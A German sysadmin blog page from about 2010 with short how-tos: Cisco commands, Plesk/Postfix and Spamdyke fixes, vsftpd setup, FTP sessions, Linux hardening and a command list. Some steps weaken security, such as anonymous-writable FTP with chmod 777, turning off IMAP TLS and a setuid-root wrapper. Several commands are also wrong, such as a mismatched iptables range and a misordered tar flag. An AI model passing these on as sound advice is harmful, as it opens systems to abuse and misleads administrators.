Einträge in der Kategorie Linux Stuff

CISCO Befehlsliste (Router und Switches)

Dez05
2010 1 Kommentar Geschrieben von Daniel

Die ganze Cisco Befehlsliste gibt es als Excel-File HIER zum download.

Hier ein paar Befehle für CISCO Router bzw. Switches:
Allgemein
1. Passwort erstellen und verschlüsseln
enable
configure terminal
enable secret "WERT"
service password-encryption
2. Password setzen
enable
configure terminal
enable password "PW"
3. Domain-lookup deaktivieren
enable
configure terminal
no ip domain-lookup
4. Hostname ändern
enable
configure terminal
hostname "WERT"
5. Speichern der Konfiguration
copy running-config startup-config
6. Speichern der Konfiguration
enable
write memory
7. Löschen des Switsches
erase startup-config (oder write erase)
8. Auslesen der aktuellen Konfiguration
enable
show running-config
9. Interfaces auflisten
show ip interface brief
10. Version anzeigen
show version
0×2102 MIT startup-config
0×2142 OHNE startup-config
11. MIT startup-config ändern
configure terminal
config-register 0×2102
12. Aktivieren von Telnet access
configure terminal
line vty 0 4
password "WERT"
login
13. Password vergessen?
Router ausschalten und mit Strg+[PAUSE] neustarten
confreg 0×2142
Switch neustarten
enable
copy startup-config running-config
configure terminal
enable password cisco (oder no enable password)
config-register 0×2102
exit
write memory
14. Flash iOS kopieren
enable
copy flash:c1841-advsecurityk9-mz.124-19.bin tftp:
Address or name of remote host []? 192.168.1.1
15. Flash iOS löschen
delete flash:c1841-advsecurityk9-mz.124-19.bin
Switch neustarten
16. Flash iOS download
tftpdnld
"IP_ADDRESS=192.168.1.254"
"IP_SUBNET_MASK=255.255.255.0"
"DEFAULT_GATEWAY=192.168.1.1"
"TFTP_SERVER=192.168.1.1"
"TFTP_FILE=c1841-advsecurityk9-mz.124-19.bin"
Tftpdnld
Werte kontrollieren und mit "Y" bestätigen.
Interface konfigurieren
1. Öffnen eines Interfaces
enable
configure terminal
interface (fa/gig/vlan) 0/0
2. Öffnen eines Sub-Interfaces
enable
configure terminal
interface (fa/gig/vlan) 0/0."ZAHL"
3. Einstellen einer IP Adresse
Interface …
ip address 192.168.10.10 255.255.255.0
no shutdown
4. Interface zu einem VLAN Zuweisen
interface fa "ZAHL"
switchport access vlan "ZAHL"
interface Serial 0/1/0
no ip address
no shutdown
no fair queue
clock rate 64000 (Default: 200000000)
Routen
1. Statisch
configure terminal
ip route "NW-Adresse Ziel" "SubNet Ziel" "Gateway"
2. Dynamisch (RIP)
configure terminal
router rip
Version 2
network "NW Adresse"
3. OSPF
configure terminal
router ospf "ZAHL"
network "NW Adresse" "Wildcard SUB" area "ID"
redistribute connected subnets
Wildcard Beispiele:
255.255.255.0 = 0.0.0.255
255.255.255.252 = 0.0.0.3
VLAN Konfigurieren
1. VLAN in Database hinzufügen
vlan database
vlan "ZAHL"
2. Alle VLANs anzeigen
show vlans
3. Alle VLANs löschen
delete flash:vlan.dat
Trunk Konfigurieren
1. Zuweisen eines Interfaces
configure terminal
interface fa "ZAHL"
switchport trunk allowed vlan "ZAHL" "ALL"
2. Zuweisen von VLANs
configure terminal
interface fa "ZAHL"
switchport mode trunk
3. Konfigurieren des dot1q
configure terminal
interface fa "ZAHL".SUBNET
encapsulation dot1q "ZAHL" (VLAN)
DHCP Konfigurieren
1. DHCP für VLAN aktivieren
ip dhcp pool vlan12
default-router 192.168.12.1
network 192.168.12.0 255.255.255.0
exit
2. IP Adresse aus DHCP exkludieren
ip dhcp excluded-address 192.168.111.2

Geposted in Allgemein - Schlagwörter cisco befehle, Cisco Befehlsliste, cisco commands, cisco router, cisco switch

mcrypt auf Mac OS X Snow Leopard 10.6.4 installieren

Jul25
2010 2 Kommentare Geschrieben von Daniel

Vorbereitung:

1. ) libmcrypt-2.5.8 source downloadeden, das gibts HIER.

2. ) PHP 5.3.1 source downloaden, das ist HIER zu finden.

3.) XCode v3 installieren, befindet sich auf der Snow Leopard installations DVD. (Oder ggf. HIER, benötigt Apple Developer membership)

Installation:

1.) Terminal öffnen (Dienstprogramme/Terminal.app)

Als nächstes muss die libmcrypt-2.5.8.tar entpackt werden und dann im Terminal in den Order “libmcrypt-2.5.8″ gewechselt werden:

^?View Code TXT

cd libmcrypt-2.5.8

2.) folgendes nacheinander im Terminal ausführen:

^?View Code TXT

MACOSX_DEPLOYMENT_TARGET=10.6 CFLAGS='-O3 -fno-common -arch i386 -arch x86_64' LDFLAGS='-O3 -arch i386 -arch x86_64' CXXFLAGS='-O3 -fno-common -arch i386 -arch x86_64' ./configure --disable-dependency-tracking
 
make -j6
 
sudo make install

So, libmcrypt währe dann fertig. Jetzt kommt die PHP-Extension:

Zuerst die “php-5.3.1.tar” entpacken und in den folgenden Ordner wechseln:

^?View Code TXT

cd php-5.3.1/ext/mcrypt

danach folgende Befehle nacheinander eingeben:

^?View Code TXT

/usr/bin/phpize
 
MACOSX_DEPLOYMENT_TARGET=10.6 CFLAGS='-O3 -fno-common -arch i386 -arch x86_64' LDFLAGS='-O3 -arch i386 -arch x86_64' CXXFLAGS='-O3 -fno-common -arch i386 -arch x86_64' ./configure --with-php-config=/Developer/SDKs/MacOSX10.6.sdk/usr/bin/php-config
 
make -j6
 
sudo make install

Jetzt die “php.ini” im Verzeichnis /etc mit dem editor nano aufmachen:

^?View Code TXT

sudo nano php.ini /etc

Die extension mcrypt.so bei Dynamic Extensions hinzufügen:

^?View Code TXT

extension=mcrypt.so

Apache neustarten, fertig.

Überprüft werden kann das ganze indem eine .php Datei mit den Wert erstellt und vom Webserver aufgerufen wird.

Es müsste dann so ein Eintrag zu sehen sein:

Geposted in Mac Stuff - Schlagwörter mac, mcrypt, mcrypt auf snow leopard, php extensions, php info, xserv

Plesk 9 größere eMails werden nicht verschickt (postfix)

Apr09
2010 Kommentieren Geschrieben von Daniel

Problem:

Emails mit größeren Anhängen (so ca. ab ~5 MB) werden nicht verschickt.

Fehlermeldungen (var/log):

postfix/smtpd[11945]: connect from unknown[127.0.0.1]
postfix/smtpd[11935]: NOQUEUE: client=unknown[123.123.123.123], sasl_method=PLAIN, sasl_username=mail@adress.com
postfix/smtpd[11945]: 1FD54603FC: client=unknown[123.123.123.123]:39211
before-queue[11942]: check handlers for addr: mail@adress.com
before-queue[11942]: Processing handlers…
before-remote[11944]: check handlers for addr: mail@adress.com
before-remote[11944]: Processing handlers…
before-remote[11944]: Timeout reading data from stream
before-remote[11944]: Unable to read data from stream
before-remote[11944]: Some error occured
postfix/smtpd[11945]: lost connection after DATA (0 bytes) from unknown[127.0.0.1]
postfix/smtpd[11945]: disconnect from unknown[127.0.0.1]
postfix/spawn[11943]: warning: command /usr/lib64/plesk-9.0/postfix-queue exit status 255

Lösung:

“/etc/postfix/master.cf” öffnen

die Zeile

smtp inet n – - – - smtpd -o smtpd_proxy_filter=127.0.0.1:10025

mit

smtp inet n – n – - smtpd

ersetzen.

Dann sollte es wieder funktionieren.

Nachteil: Der eingebaute Spamfilter (SpamAssassin) funktioniert nicht mehr…

Alternative:

Von Postfix zu Qmail umsteigen (Paralells selbst empfiehlt auch diese Variante).

Einfach folgendes ausführen und den Anweisungen folgen (Qmail kann auch nachträglich installiert werden):

/usr/local/psa/admin/sbin/autoinstaller –select-release-current –install-component qmail

Geposted in Plesk - Schlagwörter plesk postfix queue exit status 255, plesk status 255, postfix queue exit

Spamdyke unter Plesk 9 installieren und konfigurieren

Feb12
2010 2 Kommentare Geschrieben von Daniel

Anmerkung:

Ich beziehe mich auf die jetzige aktuelle Version (mit der ich es getestet hatte). Ich glaube das Spamdyke nur in verbindung mit Qmail funktioniert (da es keine direkten Configfiles hat. Genau weiss ich es aber nicht)

Verwendete Versionen:

Plesk 9.3.0

Ubuntu-8.04-x86_64

wrapper.c (vom 11 Mar 2009)

Spamdyke Control Panel 2 (vom 10 Feb 2010)

Download:

Spamdyke Control Panel 2

Anleitungen:

Inoffiziell: http://haggybear.de/de/spamdyke-mit-mysql-logging

Offiziell: http://huschi.net/25_348_de-plesk-qmail-spamdyke-mit-mysql-logging.html

Eigene Bemerkung zu der Installation von Spamdyke:

Also ich habe die “Inoffizielle” Anleitung verwendet, wobei die sich nicht wirklich unterscheidet von der “Offiziellen”. Die Datenbank habe ich mit Plesk erstellt (Datenbankname: spamdyke // Datenbankbenutzer: spamdyke // Password: r@nD0m). Danach bin ich in das phpMyAdmin gegangen und habe unter SQL folgendes ausgeführt:

CREATE TABLE `spamdyke_log_table` (
`id` bigint(7) NOT NULL auto_increment,
`time` timestamp NOT NULL default CURRENT_TIMESTAMP,
`reason` varchar(20) character set utf8 NOT NULL,
`from` varchar(50) character set utf8 NOT NULL,
`to` varchar(50) character set utf8 NOT NULL,
`ip` varchar(15) character set utf8 NOT NULL,
`rdns` varchar(50) character set utf8 NOT NULL,
`auth` varchar(25) character set utf8 NOT NULL,
PRIMARY KEY (`id`),
KEY `time` (`time`),
KEY `reason` (`reason`,`from`,`to`,`ip`,`rdns`)
)

Danach habe ich das Spamdyke gedownloaded und die INSTALL.TXT befolgt (Das solltet ihr auch UNBEDINGT machen ^^)

Da es dann noch nicht funktioniert hatte, habe ich die FAQ gelesen, hier nochmal die Wichtigsten Punkte…

FAQ:

Fehlermeldung beim starten von Spamdyke (Über das Plesk-Interface):

Spamdyke ist nicht installiert, oder der Pfad zur spamdyke.conf in config.inc.php stimmt nicht!!

Also folgende Punkte sollte man UNBEDINGT überprüft haben!!!

1. “wrapper” überprüfen. Sollte man die aktuelle Version von Plesk verwenden, muss man die wrapper.c von der Offiziellen Seite downloaden (HIER der Link zum Wrapper) und direkt in das /opt/psa/admin/htdocs/spamdyke kopieren. Danach folgendes ausführen:

gcc wrapper.c -o wrapper
strip wrapper

Nachdem das erledigt ist, tue folgendes:
chown root:root wrapper
chmod 4755 wrapper

2. Sollte es danach immer noch nicht funktionieren (und Ubuntu verwenden) muss noch folgendes eingegeben werden:
ln -sf /bin/bash /bin/sh

Spamdyke zeigt zwar das Interface im Plesk an, aber die Mails werden nicht über Spamdyke versendet:

Einfach mal den xinetd Dienst neustarten –> ./etc/init.d/xinetd restart

Geposted in Plesk - Schlagwörter plesk spamdyke, qmail spamdyke, spamdyke installieren

Plesk Default smtp_psa und smtps_psa

Feb12
2010 Kommentieren Geschrieben von Daniel

Wer es braucht….

/etc/xinetd.d/smtp_psa:

service smtp
{
socket_type     = stream
protocol        = tcp
wait            = no
disable         = no
user            = root
instances       = UNLIMITED
env             = SMTPAUTH=1
server          = /var/qmail/bin/tcp-env
server_args     = -Rt0 /var/qmail/bin/relaylock /var/qmail/bin/qmail-smtpd /var/qmail/bin/smtp_auth /var/qmail/bin/true /var/qmail/bin/cmd5checkpw /var/qmail/bin/true
}

/etc/xinetd.d/smtps_psa:

service smtps
{
socket_type     = stream
protocol        = tcp
wait            = no
disable         = no
user            = root
instances       = UNLIMITED
env             = SMTPAUTH=1
server          = /var/qmail/bin/tcp-env
server_args     = -Rt0 /var/qmail/bin/relaylock /var/qmail/bin/qmail-smtpd /var/qmail/bin/smtp_auth /var/qmail/bin/true /var/qmail/bin/cmd5checkpw /var/qmail/bin/true
}

Geposted in Plesk - Schlagwörter smtps_psa, smtp_psa, xinetd.d

FTP Server unter Debian einrichten

Jan27
2010 Kommentieren Geschrieben von Daniel

Hier eine Anleitung wie man unter Debian ein FTP Server einrichtet:

Beschreibung: Den FTP Server so einrichten das man als anonymous zugreifen kann und Dateien
hochladen bzw. Verzeichnisse erzeugen kann.

Suchen nach Paketen: apt-cache search „Suchbegriff“
Installieren des „vsftpd“ mit dem Befehl „apt-get install vsftpd“. Mit YES die Meldung Bestätigen.

1. Die Konfig-File von vsFTPd mit nano /etc/vsftpd.conf öffnen.

2. Dann bei den drei Parameter:
anon_upload_enable
anon_mkdir_write_enable
write_enable
das „#“ entfernen (auskommentieren).

3. In das Verzeichnis /home/ftp gehen (cd /home/ftp) und mit mkdir upload einen Ordner erstellen. Diesen
dann mit chmod 777 upload, die nötigen Schreibrechte vergeben.

4. VsFTPd Dienst neu starten (in das Verzeichnis /etc/init.d wechseln (cd /etc/init.d/)) und ./vsftpd restart
eingeben.

Fertig!

Schlagwörter debian ftp server, ftp server debian, ftp server linux

FTP über Terminal

Jan27
2010 Kommentieren Geschrieben von Daniel

Aufgaben:
1. Zugriff anonymous
2. Download Verzeichnis + 3 Dateien
3. Zugriff nicht anonymous
4. Upload Verzeichnis + 3 Dateien
5. Download einer Datei
5.1 mit aktiver Datei Session
5.2 mit passiver Datei Session

1. Der Zugriff mit dem User „anonymous“ funktioniert mit folgenden Befehl:

ftp 192.168.100.22

Es wird dann nach einem Benutzername gefragt, dort muss dann „anonymous“ eingegeben werden. Das „Password“ bleibt bei anonymous leer.

maxi@maxi-desktop:~$ ftp 192.168.100.22

Connected to 192.168.100.22.

220-FileZilla Server version 0.9.27 beta

220-written by Tim Kosse (Tim.Kosse@gmx.de)

220 Please visit http://sourceforge.net/projects/filezilla/

Name (192.168.100.22:maxi): anonymous

331 Password required for anonymous

Password:

230 Logged on

Remote system type is UNIX.

ftp>

2. Um die 3 Dateien zu downloaden muss man in den Ordner download wechseln („cd download“) den Command „mget *“ eingeben. (* = Wildcard, zählt quasi für alle Dateien im Ordner).

3. Der Zugriff funktioniert genauso wie in Punkt 1 Beschrieben nur das bei Name „test“ und bei Password auch „test“ angegeben werden muss.

4. Eine Datei kann mit „mput <Datei>“ geuploaded werden. Es ist auch mit „mput *“ möglich alle Dateien in einem Ordner hoch zu laden.

5.1 Der Download im „active mode“ ist der Standard ausgewählte Modus wenn man sich mit „ftp 192.168.100.22“ verbindet.

Im Wireshark ist folgendes zu beobachten:

Anmeldung im active mode:

220-FileZilla Server version 0.9.27 beta

220-written by Tim Kosse (Tim.Kosse@gmx.de)

220 Please visit http://sourceforge.net/projects/filezilla/

USER test

331 Password required for test

PASS test

230 Logged on

SYST

215 UNIX emulated by FileZilla

PORT 192,168,100,200,148,152

200 Port command successful

NLST test

150 Opening data channel for directory list.

226 Transfer OK

PORT 192,168,100,200,187,218

200 Port command successful

RETR test

150 Opening data channel for file transfer.

226 Transfer OK

QUIT

221 Goodbye

Beim aktiven FTP (auch „Active Mode“) öffnet der Client einen zufälligen Port und teilt dem Server diesen sowie die eigene IP-Adresse mittels des PORT-Kommandos mit. Dies ist typischerweise ein Port des Clients, der jenseits von 1023 liegt, kann aber auch ein anderer Server sein, der seinerseits in den Passive Mode geschaltet wurde, also auf eine Verbindung wartet. Die Datenübertragung auf der Server-Seite erfolgt dabei über Port 20.

5.2 Um sich im „passive mode“ zu verbinden muss der Parameter „-p“ beim verbinden angegeben werden. D.h. eine Verbindung muss mit „ftp -p 192.168.100.22“ zum FTP-Server aufgebaut werden.

Anmeldung im passive mode:

220-FileZilla Server version 0.9.27 beta

220-written by Tim Kosse (Tim.Kosse@gmx.de)

220 Please visit http://sourceforge.net/projects/filezilla/

USER test

331 Password required for test

PASS test

230 Logged on

SYST

215 UNIX emulated by FileZilla

PASV

227 Entering Passive Mode (192,168,100,22,7,251)

RETR test

150 Connection accepted

226 Transfer OK

QUIT

221 Goodbye

Beim passiven FTP (auch „Passive Mode“) sendet der Client ein PASV-Kommando, der Server öffnet einen Port und übermittelt diesen mitsamt IP-Adresse an den Client. Hier wird auf der Client-Seite ein Port jenseits 1023 verwendet und auf der Server-Seite der vorher an den Client übermittelte Port.

Schlagwörter ftp telnet, ftp über terminal

Horde Login – Anmeldung fehlgeschlagen

Jan21
2010 Kommentieren Geschrieben von Daniel

Sollte es vorkommen das nach einem Update von courier-imap plötzlich der Login in Horde nicht mehr funktioniert, führt einfach folgende Schritte aus:

1. Auf den Server verbinden (mit root-Rechten)
2. cd /etc/courier-imap
3. nano imapd-ssl
4. Wert “IMAP_TLS_REQUIRED=1″ (Ohne Anführungstiche) suchen und ihn ihn “IMAP_TLS_REQUIRED=0″ (Ohne Anführungstiche) ändern.
5. Datei Speichern
6. courier-imap-Dienst neustarten (mit cd /etc/init.d und dann “./courier-imap restart” eingeben) (Ohne Anführungstiche)

Hier nochmal ein kleiner Test mit Telnet:

VORHER:

telnet localhost 143
Trying 127.0.0.1…
Connected to localhost.
Escape character is ‘^]’.
* OK [CAPABILITY IMAP4rev1 UIDPLUS CHILDREN NAMESPACE THREAD=ORDEREDSUBJECT THREAD=REFERENCES SORT QUOTA IDLE ACL ACL2=UNION STARTTLS LOGDISABLED] Courier-IMAP ready. Copyright 1998-2004 Double Precision, Inc. See COPYING for distribution information.
a login mail@adresse.de
a NO STARTTLS required

NACHHER:

telnet localhost 143
Trying 127.0.0.1…
Connected to localhost.
Escape character is ‘^]’.
* OK [CAPABILITY IMAP4rev1 UIDPLUS CHILDREN NAMESPACE THREAD=ORDEREDSUBJECT THREAD=REFERENCES SORT QUOTA IDLE ACL ACL2=UNION STARTTLS] Courier-IMAP ready. Copyright 1998-2004 Double Precision, Inc. See COPYING for distribution information.
a login mail@adresse.de
a NO Error in IMAP command received by server.
a login mail@adresse.de passsword
a OK LOGIN Ok.
a logout
* BYE Courier-IMAP server shutting down
a OK LOGOUT completed

Geposted in Plesk - Schlagwörter horde Anmeldung fehlgeschlagen., horde login fail, horde password fail, plesk horde Login fehlgeschlagen, plesk horde password fehlerhaft

Horde/Atmail immer auf https umleiten

Jan05
2010 Kommentieren Geschrieben von Daniel

Folgendes Script einfach in eine .htaccess Datei schreiben und diese in das direkte Verzeichnis reinladen das immer auf https (SSL-Verschlüsselt) umgeleitet werden soll.

^?Download .htaccess

RewriteEngine On
RewriteCond %{SERVER_PORT}     !^443$
RewriteRule (.*)  https://%{SERVER_NAME}%{REQUEST_URI}
RewriteEngine OnRewriteCond %{SERVER_PORT}     !^443$RewriteRule (.*)  https://%{SERVER_NAME}%{REQUEST_URI}

bei Horde müsste die .htaccess in folgendes Verzeichnis kopiert werden: /usr/share/psa-horde/

Geposted in Plesk - Schlagwörter http auf https, SSL umleitung

Die Linux Grundlagen

Dez13
2009 Kommentieren Geschrieben von Daniel

1.1 Allgemeines
• UNIX ca. 1969 für Großrechner
• ca. 1991 Linux für PCs
• Multiuser, Multitasking
• Verwaltet verschiedene Benutzergruppen
• Systemadministrator hat den Namen: root
• Herunterfahren des Systems (meist nur durch root); Befehl: shutdown –h now
• Unterscheidung zwischen Groß- und Kleinbuchstaben bei Dateinamen.
• Umlaute (ä, ü, ö, und ß) sind in Dateinamen nicht erlaubt.
• Lange Namen (bis 255 Zeichen) möglich.
• Verzeichnisse werden mit Slashen / und nicht durch Backslash \ dargestellt.

Bsp.: /home/raid/<username>

• Keine Laufwerksbezeichnungen

Geräte (und Partitionen) werden wie Verzeichnisse behandelt.

/dev/Lpr
Device/Drucker

/dev/fd0
Device/Diskettenlaufwerk

Erste Partition der ersten Festplatte:

/dev/hda1
Erste Partition (a) Erste Festplatte (1)

Zweite Partition der dritten Festplatte:

/dev/hdb3
Zweite Festplatte (b) Dritte Partition (3)

CDRom-Laufwerk:
/dev/cdrom

SCSI-Laufwerk:
/dev/scd0

Auf die Inhalte der Laufwerke kann nur zugegriffen werden nachdem diese
„gemounted“ worden sind. (Befehl: mount – t /dev/hda1 /windows)
Mount = montieren, einhängen
WEITERLESEN… »

Schlagwörter Allgemeine Linux Informationen, Linux Allgemein, Linux Grundlagen

Linux Server absichern

Dez13
2009 Kommentieren Geschrieben von Daniel

1. root-User deaktivieren:
zuerst den Befehl

adduser

eingeben. Dann einen neuen Benuzernamen eingeben (Er sollte mehr als 6 Buchstaben haben)

danach in der Datei “sshd_config” im Verzeichnis “/etc/ssh/”
die Zeile:

PermitRootLogin yes

suchen und mit no ersetzen. (PermitRootLogin no)
Beim nächsten Login mit dem neuen User einloggen und mit dem Befehl:

root-Rechte bekommen. Fertig!

2. SSH-Port ändern:
Die Datei “sshd_config” im Verzeichnis “/etc/ssh/” öffnen und in der Zeile wo

port 22

steht einfach z.B. port 222 reinschreiben, danach in das Verzeichnis /etc/init.d/ wechseln und den SSHd-Dienst mit ./sshd restart neu starten. Dann macht ein Zweites Putty-Fenster auf und probiert die Konfiguration aus. (Nicht vergessen den Verbindungsport dann im Putty auch dem entsprechend zu ändern )

3. Port Sperren:
einfach (um z.B. port 80 zu sperren)

iptables –A INPUT –dport 80 –j DROP

eingeben.

4. Eine IP-Adresse sperren:
Wir wollen z.B. die IP-Adresse 74.125.50.90 sperren:

iptables –A INPUT –s 74.125.50.90 –j DROP
eingeben.

Eine Range kann mit folgendem Befehl gesperrt werden (Beispiel: 74.124.0.0 bis 74.124.255.255):

iptables –A INPUT –s 74.125.0.0/24 –j DROP

5. Gegen DDoS (Distributed Denial of Service) schützen:
Eine gute Anleitung gibt es unter huschi.net

Schlagwörter ip range sperren, linux absichern, linux port sperren, root account deaktivieren, root server absichern, ssh port ändern

Linux Befehle

Dez13
2009 Kommentieren Geschrieben von Daniel

Hier mal ein paar Linux-Befehle:

chown -R mygov /home/blablub = Gibt für den User mygov die Berechtigung um files auszuführen.

find . -name *locali* = Sucht nach *locali* und spuckt die Ergebnisse aus.

pwd = Zeigt das aktuelle Verzeichnis an indem man sich gerade befindet.

mkdir -p /tmp/dir1/dir2 = Erstellt den Verzeichnisbaum /tmp/dir1/dir2

rm -f file1 = Löscht die Datei “file1″

chown user1 file1 = Ändert den Besitzer der “file1″ zu “user1″

chown -R user1 directory1 = Ändert den Besitzer des Ordners “directory1″ und alle Unterordner inkl. Dateien in “user1″

tar -xvfj archive.tar.bz2 = Entpackt bz2 Archive

tar -xvfz archive.tar.gz = Entpackt gz Archive

tar -zxf <name.tgz> = Entpackt tgz Archive

unzip file1.zip = Entpackt zip Files

Update:

Verzeichnis Operationen

cd
Wechselt in das angegebene Verzeichnis

ls
Zeigt den Inhalt des aktuellen oder des angegebenen Verzeichnisses an

mkdir
Legt ein neues Verzeichnis an

pwd
Zeigt das aktuelle Verzeichnis an

rmdir
Loescht ein Verzeichnis

Editoren

emacs
Maechtiger Editor mit Mail und News-Funktionen.

joe
Editor mit WordStar-aehnlichem Userinterface

pico
Einfacher Editor, der auf dem Pine-Composer basiert.

vi
Standard Unix-Editor.

vim
vi-Improved. vi mit erweiterter Funktionalitaet

Datei Operationen

basename
Gibt einen Dateinamen ohne Pfadangaben aus

cat
Verbindet mehrere Dateien und gibt das Ergebnis auf Standardausgabe aus

chgrp
Gruppenzugehoerigkeit einer Datei aendern

chmod
Zugriffsrechte aendern (rwx)

chown
Eigentuemer einer Datei aendern

cmp
Vergleicht zwei Dateien auf Uebereinstimmung

cp
Kopiert Dateien und Verzeichnisse

cpio
Kopiert Dateien in bzw. aus Archiven

dirname
Gibt nur den Pfad zu einer Datei aus

file
Zeigt den Dateitypen einer Datei an.

head
Gibt die ersten Zeilen einer Datei aus

less
Eine bestimmte Anzahl Zeilen einer Datei anzeigen

ln
Erstellt einen Link zu einer Datei/Verzeichnis

mkdirhier
Erstellt eine Verzeichnishierarchie

more
Durch einen Text scrollen (nur nach unten).

mv
Verschiebt Dateien und Verzeichnisse (bennennt auch um)

rm
Loescht Dateien und Verzeichnisse

split
Datei aufteilen (zB zum Transport per Mail oder Diskette)

tail
Gibt die letzten Zeilen einer Datei aus

touch
Aendert den Zeitstempel von Dateien.
Wenn eine Datei nicht existiert, wird sie mit einer
Groesse von 0 Byte angelegt

Hilfe anzeigen

apropos
Zeigt die Titel von man-pages zu einem gegebenen Stichwort an

info
Zeigt GNU Info Seiten an. info ist eine Alternative
zu man, die vor allem von GNU Software genutzt wird.

man
Zeigt man-pages an. man-pages sind Seiten aus dem
Linux Programmer’s Manual.

whatis
Zeigt die Titel von man-pages zu einem gegebenen Stichwort an

ISDN Management

imon
Zeigt Informationen ueber die aktuellen ISDN-Verbindungen an

isdnctrl
Setzt ISDN Informationen bzw gibt diese zurueck.
Startet und beendet auch eine ISDN Verbindung.

Kommunikation

wall
Schickt den Inhalt einer Datei an alle angemeldeten User.

mail
Sendet eine E-Mail an einen User.

mailq
Zeigt noch zu versendende Mails an

mesg
Stellt ein, ob Nachrichten anderer User auf dem
eigenen Screen angezeigt werden sollen.

talk
‘kopiert’ Zeilen vom Screen eines Users auf den Screen
eines anderen Users. Das heisst mit talk koennen sich zwei User ‘unterhalten’

write
Schreibt eine Nachricht auf die Console eines anderen Users,
sofern dieser diese Option nicht mit mesg abgeschaltet hat.

Komprimierung

tar
Archiv- und Bibliotheksverwaltung

compress
Komprimiert Dateien im Lempel-Ziv Verfahren

gzip
Komprimiert und dekomprimiert Dateien im Lempel-Ziv Verfahren

tar
Komprimiert und dekomprimiert Archive mehrerer Dateien

unzip
Dekomprimiert zip-Archive.

zip
Komprimiert Dateien. zip-Archive werden auch von PKZIP und WinZip (DOS/Win)

Verschiedenes

alias
“Legt alias-Namen fuer Kommandos an.
Zum Beispiel ‘alias rmd=”"rm -rf “”‘”

at
Einmaliges ausfuehren eines Befehles zu einer bestimmten Zeit

batch
Einmaliges ausfuehren eines Befehles wenn das System nicht ausgelastet ist

cal
Zeigt einen Kalender an

clear
Loescht die Konsole

comm
Selektiert gleiche Zeilen der Ausgabe/Datei

crontab
Zeigt die userspezifische Cron-Tabelle an, bzw. oeffnet sie zum editieren

date
Gibt das aktuelle Datum aus.

echo
Gibt einen Text auf der Konsole aus.

env
Gibt alle Umgebungsvariablen aus.

expr
Auswerten von Ausdruecken.

find
Durchsucht den Verzeichnisbaum, ausgehend vom aktuellen Verzeichnis,
nach einer Datei.

fold
Bricht ueberlange Zeilen um

grep
Sucht nach einer Zeichenfolge in einer Datei, oder einer
umgeleiteten Ausgabe (echo test.txt | grep blafasel)

halt
Runterfahren des Systems.

history
Gibt die Eintraege im History-File des Users nummeriert aus

hostname
Zeigt den Namen des Rechners an

init
Runlevel wechseln

join
Verknuepft Zeilen der Ausgabe

nl
Nummeriert die Zeilen der Ausgabe

pr
Konvertiert Texte zum Drucken.

printenv
Gibt alle Umgebungsvariablen aus.

reboot
Neu starten des Systems.

rev
Zeichenfolge umkehren

shutdown
Runterfahren, bzw. Reboot des Systems

sleep
Eine Anzahl von Sekunden warten

sort
Sortiert die Ausgabe von Programmen, bzw Dateien

strings
Extrahiert alle (lesbaren) Zeichenfolgen aus einer Datei/Eingabe

sum
Ermittelt Dateilaenge und Pruefsumme einer Datei

tee
Verdoppelt die Ausgabe eines Programmes
(zum gleichzeitigen Anzeigen auf Bildschirm und mitloggen in Datei)

type
Zeigt den Typen einer Datei und die Interpretation des Dateinamens als Parameter an

uniq
Entfernt doppelte Zeilen in einer Datei

wc
Zaehlt Buchstaben, Zeilen und Woerter der Eingabe.

Netzwerk Management

ftp
Öffnet eine FTP-Session zum angegebenen Rechner. Per FTP
(File Transfer Protocol) koennen verschiedene Datei- und
Verzeichnisoperationen auf dem entfernten Rechner durchgefuehrt werden.

ifconfig
Konfiguriert Netwerk-Schnittstellen, bzw gibt deren
Konfiguration und Status aus

ipchains
Tool zur Konfiguration der Kernel-Firewall

netdate
Zeitsynchronisation mit entferntem Rechner

netstat
Gibt Informationen ueber Netzwerkverbindungen, Routingtabellen ua aus

ping
Sendet kleine Datenpakete an die angegebene IP-Adresse bzw. den
angegebenen DNS-Namen und wartet auf eine Antwort der Gegenstelle.
Zum ueberpruefen einer Netzverbindung

rcp
Remote Copy. Kopiert auf entfernten Rechner.

route
Manipuliert die Routen zu entfernten Rechnern.
Normalerweise zum Erstellen einer statischen Route zu einem speziellen Rechner.

telnet
Öffnet eine Telnet-Session zum angegebenen Rechner. Per Telnet
kann ein anderer Rechner “ferngesteuert” werden.

tty
Zeigt das device an, ueber das man angemeldet ist

Partitions Management

badblocks
Durchsucht einen Partition nach beschaedigten Bloecken (BadBlocks)

dd
Kopiert Partitionen/Dateisysteme bytegenau

dumpe2fs
Gibt Informationen ueber das Dateisystem auf einer Partition aus

e2fsck
Prueft und repariert Linux ext2 Dateisysteme

e2label
Weist einem Dateisysten ein Label (Bezeichnung) zu,
bzw gibt das Label aus

fdisk
Legt Partitionen an und loescht sie. Anzeige der aktuellen Partitionstabelle

fsck
Prueft und repariert Linux Dateisysteme

hdparm
Programm zum Einstellen verschiedener Parameter einer Festplatte

mkdosfs
Erzeugt ein Dos (FAT16 und FAT32) Dateisystem auf
der angegebenen Partition

mke2fs
Erzeugt ein ext2 Dateisystem auf der angegebenen Partition

mkfs
Frontend zu verschiedenen Filesystem-Erstellern

mkswap
Erzeugt eine Linux Swap-Partition auf der angegebenen Partition

mount
Haengt ein Dateisystem (eine Partition, Diskette..) in
den Verzeichnisbaum ein (an einen Mountpoint)

tune2fs
Programm zum Einstellen verschiedener Parameter
des ext2 Dateisystems (zB maximal mount count)

umount
Loest ein Dateisystem aus dem Verzeichnisbaum

Prozess Management

kill
Beendet den Prozess mit der uebergebenen Prozess-ID (PID)

killall
Beendet alle Prozesse mit dem uebergebenen Namen

killproc
Beendet den Prozess, dessen ausfuehrbare Datei im
uebergebenen Pfad zu finden ist

nice
Setzt die Prioritaet eines Prozesses

nohup
Startet ein Programm immun gegen SIGHUPs

pidof
Gibt die PID(s) des Prozesses mit dem uebergebenen Namen aus

ps
Zeigt alle Prozesse mit ihrer PID, der User-ID des
ausfuehrenden Users, die Terminal-ID etc. an

pstree
Zeigt alle Prozesse in einer Baumdarstellung an

top
Zeigt Prozesse in einer sich staendig aktualisierenden
Liste an. Die Prozesse, die die meiste CPU-Zeit brauchen,
werden zu oberst angezeigt.

Drucken

lpq
Druckauftraege anzeigen

lpr
Druckauftrag in Druckerschlange stellen

lprm
Druckauftrag loeschen

lptest
Testmuster zum Druckertest ausgeben (lptest | lpr)

Suchen

find
Umfangreiches Suchtool

locate
Sucht Dateien mittels eines Indexes, der durch updatedb erstellt wird

updatedb
Erstellt einen Suchindex ueber das gesammte
Dateisystem fuer locate

whereis
Sucht das Binary (ausfuehrbare Datei), den Quellcode
und die man-Page eines Programmes

which
Gibt den ersten gefunden Pfad eines Programmes im Pfad (echo $PATH) an

System Infos

df
